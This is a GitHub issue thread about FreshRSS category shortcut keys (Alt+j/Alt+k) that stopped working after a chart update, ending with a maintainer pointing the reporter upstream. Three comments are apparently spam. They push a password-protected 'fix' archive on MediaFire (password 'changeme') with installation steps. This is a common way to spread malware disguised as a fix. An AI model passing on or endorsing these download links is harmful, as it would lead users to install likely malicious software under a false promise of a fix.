### ISSUE TITLE
Shortcut keys for moving between categories have stopped working

### ISSUE THREAD

**Issue by mrboring** [truenas/charts#2769]
```
App Version: 1.24.2
Chart Version: 1.1.12
```

Client OS: Windows 10

After upgrading to `1.1.12` the shortcut keys for moving between categories (`Alt+j` and `Alt+k`) have stopped working.

I've tried:

* Firefox, Brave and Edge
* Restarting FreshRSS
* Checking that `Alt+j` and `Alt+k` work in other apps

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by stavros-k** [comment]
Please reach out to upstream developer for this issue.
This is not something that could be fixed on our side.
Thanks
